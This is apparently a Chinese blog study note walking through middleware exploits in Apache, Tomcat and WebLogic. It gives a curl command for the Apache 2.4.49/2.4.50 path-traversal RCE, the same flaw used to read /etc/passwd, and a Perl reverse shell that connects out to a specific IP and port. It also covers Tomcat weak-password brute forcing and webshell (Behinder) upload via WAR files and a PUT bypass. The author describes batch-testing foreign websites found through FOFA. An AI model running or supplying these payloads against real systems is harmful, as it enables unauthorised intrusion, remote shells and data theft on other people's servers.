中间件的安全问题

发布于:2025-03-20 ⋅ 阅读:(23) ⋅ 点赞:(0)

前言

了解常见的中间件 : IIS 、 apache、nignx、tomcat

环境搭建中间件的安全问题主要就是实战以前发现的CVE漏洞

环境搭建 上个笔记有如何在kali进行搭建docker

准备kali   已经搭建了docker  

sudo docker pull vulfocus/vulfocus:latest 
拉取镜像
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxxx vulfocus/vulfocus
启动镜像    run是运行   -d 在后台   -p 端口   -v是进行挂载  : 后边是容器的路径   意思就是把容器的内容映射到本地机目录上    而  -e是设置容器的环境变量

注意这个 ip 0000 是你本机的ip

里面有个log

apache框架下有利于价值的CVE

1、RCE命令执行 

应用于apache  2.4.49-2.4.50

我们利用漏洞之前先找到这个漏洞的中间件的版本

正好是在这个版本的

利用exp进行操作

使用服务器进行curl请求
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'


抓包改包修改
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

利用exp进行操作

这个rce框架漏洞我们可以进行全网搜   先使用 fafoviewer生成使用fafo搜索的信息可以去批量的测试(这里测试的都是外国网站)

fofa语法:

这边只导出10个是因为我设置的最大导出  

2、目录穿越漏洞

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

可以直接访问

tomcat框架

1、弱口令爆破

这个就是利用tomcat登录弹窗的弱密码

之后需要getshell

骚操作: 冰蝎生成一个jar木马

和gzl有很明显的差别就是开头没有system

这里让我们上传的是  war文件

压缩一下改名为 war

http://192.168.248.132:11374/shell/shell.jsp

连接上就行

2、文件上传漏洞

Apache Tomcat 7.0.0 - 7.0.79

然后复制木马的内容到这个请求数据包的下面

发现报错404??????什么情况   是因为我们后边的http把这个1.jsp当路径处理了但是这个网站内部是没有这个的所以报错了

绕过方式 :   /xx.jsp/          //进行包裹 

就可以进行连接了

3、文件包含漏洞

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

使用

这个工具是py2开发的

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

weblogic

没什么好说的就是工具梭哈  

天狐工具包wx搜 狐狸即可下载

点击检查  如果不知道是哪个CVE就一把梭   知道会快很多